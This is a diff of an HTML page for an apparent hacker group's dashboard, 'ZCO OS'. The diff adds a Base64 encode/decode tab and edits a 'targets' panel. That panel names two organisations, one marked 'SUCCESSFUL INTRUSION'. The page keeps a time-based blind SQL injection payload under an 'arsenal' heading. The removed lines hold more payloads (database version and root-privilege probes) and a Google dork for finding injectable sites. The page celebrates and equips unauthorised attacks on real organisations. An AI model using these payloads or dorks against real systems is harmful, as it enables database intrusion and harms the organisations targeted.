--- a/index.html
+++ b/index.html
@@ -3,12 +3,12 @@
 <head>
 <meta charset="UTF-8">
 <meta name="viewport" content="width=device-width, initial-scale=1.0">
-<title>ZCO OS v2.5 | Global Command</title>
+<title>ZCO OS v2.8 | Cipher Active</title>
 <style>
 :root { --c: #00f2ff; --b: #050505; --g: #00ff41; --r: #ff0000; }
 body { background: var(--b); color: var(--c); font-family: monospace; text-align: center; margin: 0; padding-bottom: 50px; }
-.nav { display: flex; gap: 5px; padding: 10px; border-bottom: 1px solid var(--c); position: sticky; top: 0; background: var(--b); z-index: 100; }
-.btn { flex: 1; background: transparent; border: 1px solid var(--c); color: var(--c); padding: 8px; cursor: pointer; font-size: 11px; transition: 0.3s; }
+.nav { display: flex; gap: 5px; padding: 10px; border-bottom: 1px solid var(--c); position: sticky; top: 0; background: var(--b); z-index: 100; flex-wrap: wrap; }
+.btn { flex: 1; min-width: 60px; background: transparent; border: 1px solid var(--c); color: var(--c); padding: 8px; cursor: pointer; font-size: 11px; transition: 0.3s; }
 .btn.active { background: var(--c); color: #000; box-shadow: 0 0 15px var(--c); }
 .sec { display: none; padding: 20px; animation: scan 0.4s ease-out; }
 @keyframes scan { from { opacity: 0; transform: translateY(10px); } to { opacity: 1; transform: translateY(0); } }
@@ -17,7 +17,13 @@ th, td { border: 1px solid var(--c); padding: 10px; text-align: center; }
 th { background: rgba(0, 242, 255, 0.1); }
 .card { width: 100%; max-width: 320px; border: 2px solid var(--c); margin: 0 auto 15px auto; display: block; }
 
-/* قسم القضايا والأدوات الاحترافي */
+/* قسم التشفير الجديد */
+.cipher-container { border: 1px solid var(--g); padding: 15px; background: rgba(0, 255, 65, 0.05); text-align: right; }
+textarea { width: 100%; background: #111; border: 1px solid var(--c); color: var(--g); padding: 10px; font-family: monospace; resize: none; box-sizing: border-box; margin-top: 10px; }
+.crypt-btn { width: 48%; margin: 10px 1% 0 1%; background: var(--g); border: none; padding: 10px; font-weight: bold; cursor: pointer; color: #000; }
+.crypt-btn:active { opacity: 0.7; }
+
+/* قسم القضايا والأدوات */
 .radar-container { border: 1px solid var(--g); padding: 15px; background: rgba(0, 255, 65, 0.05); text-align: left; direction: ltr; margin-top: 10px; }
 .target-box { border-left: 4px solid var(--g); background: rgba(0, 255, 65, 0.1); padding: 10px; margin-bottom: 12px; }
 .target-box.pending { border-left-color: var(--r); background: rgba(255, 0, 0, 0.1); }
@@ -43,6 +49,7 @@ th { background: rgba(0, 242, 255, 0.1); }
         <button class="btn" onclick="tab('rk',this)">الرتب</button>
         <button class="btn" onclick="tab('cs',this)">القضايا</button>
         <button class="btn" onclick="tab('tl',this)">الأدوات</button>
+        <button class="btn" onclick="tab('cp',this)" style="border-color:var(--g); color:var(--g);">التشفير</button>
     </div>
 
     <div id="id" class="sec" style="display:block;">
@@ -54,34 +61,35 @@ th { background: rgba(0, 242, 255, 0.1); }
         </div>
     </div>
 
+    <div id="cp" class="sec">
+        <div class="cipher-container">
+            <h3 style="color:var(--g); margin:0;">🔒 وحدة التشفير السرية</h3>
+            <p style="font-size: 10px; color: var(--c);">تستخدم لتأمين المراسلات الميدانية بين الوحدات.</p>
+            <textarea id="inputText" rows="4" placeholder="أدخل النص المراد معالجته هنا..."></textarea>
+            <div style="display: flex;">
+                <button class="crypt-btn" onclick="runCrypt(true)">تشفير (ENCODE)</button>
+                <button class="crypt-btn" style="background:var(--c);" onclick="runCrypt(false)">فك التشفير (DECODE)</button>
+            </div>
+            <textarea id="outputText" rows="4" placeholder="النتيجة ستظهر هنا..." readonly style="border-color:var(--g); margin-top:15px;"></textarea>
+        </div>
+    </div>
+
     <div id="rk" class="sec">
         <h3 style="color:var(--c);">[H-COMMAND UNITS]</h3>
         <table>
             <tr><th>RANK</th><th>CODE</th><th>UNIT</th></tr>
             <tr style="background:rgba(0,255,65,0.1);"><td style="color:var(--g); font-weight:bold;">Director of ZCO</td><td>Z-01</td><td>CORE HQ</td></tr>
             <tr><td style="color:var(--g);">Deputy Director of ZCO</td><td>Z-02</td><td>TECHNICAL</td></tr>
-            <tr><td>Major Colonel</td><td>Z-03</td><td>FIELD OPS</td></tr>
-        </table>
-        
-        <h3 style="color:var(--c); margin-top:25px;">[FIELD OPERATIONS]</h3>
-        <table>
-            <tr><th>RANK</th><th>CODE</th><th>LEVEL</th></tr>
-            <tr><td>Captain</td><td>Z-04</td><td>SENIOR</td></tr>
-            <tr><td>Sergeant</td><td>Z-05</td><td>TACTICAL</td></tr>
-            <tr><td>Cadet</td><td>Z-06</td><td>RECRUIT</td></tr>
         </table>
     </div>
 
     <div id="cs" class="sec">
         <div class="radar-container">
             <h3 style="color:var(--g); margin:0 0 15px 0;">📡 OPERATIONAL RADAR</h3>
-            
             <div class="target-box">
                 <h4>TARGET #001: BOSS PACIFIC</h4>
-                <small>STATUS: SUCCESSFUL INTRUSION</small><br>
-                <small>DATA: Directory Indexing Secured</small>
+                <small>STATUS: SUCCESSFUL INTRUSION</small>
             </div>
-
             <div class="target-box pending">
                 <h4>TARGET #002: HICIT EGYPT</h4>
                 <small>STATUS: BLIND DETECTION PENDING</small>
@@ -94,9 +102,6 @@ th { background: rgba(0, 242, 255, 0.1); }
             <h3 style="color:var(--g); margin:0 0 15px 0;">🛠️ TIME-BASED ARSENAL</h3>
             <ul class="payload-list">
                 <li><b style="color:var(--c);">[TEST VULN]:</b><br>AND (SELECT 1 FROM (SELECT(SLEEP(10)))ZCO)--</li>
-                <li><b style="color:var(--c);">[DB VERSION]:</b><br>AND IF(version() LIKE '5%', SLEEP(10), 0)--</li>
-                <li><b style="color:var(--c);">[PRIVILEGE]:</b><br>AND IF(user() LIKE 'root%', SLEEP(10), 0)--</li>
-                <li><b style="color:var(--c);">[DORKING]:</b><br>inurl:news.php?id=</li>
             </ul>
         </div>
     </div>
@@ -118,6 +123,22 @@ function tab(t,b){
     let bt=document.getElementsByClassName('btn');
     for(let x of bt) x.classList.remove('active');
     b.classList.add('active');
+}
+
+// محرك التشفير الخاص بـ ZCO
+function runCrypt(isEncode) {
+    const input = document.getElementById('inputText').value;
+    const output = document.getElementById('outputText');
+    if(!input) return;
+    try {
+        if(isEncode) {
+            output.value = btoa(unescape(encodeURIComponent(input)));
+        } else {
+            output.value = decodeURIComponent(escape(atob(input)));
+        }
+    } catch(e) {
+        output.value = "⚠️ خطأ في المعالجة: تأكد من صحة الكود المشفر.";
+    }
 }
 </script>
 </body>
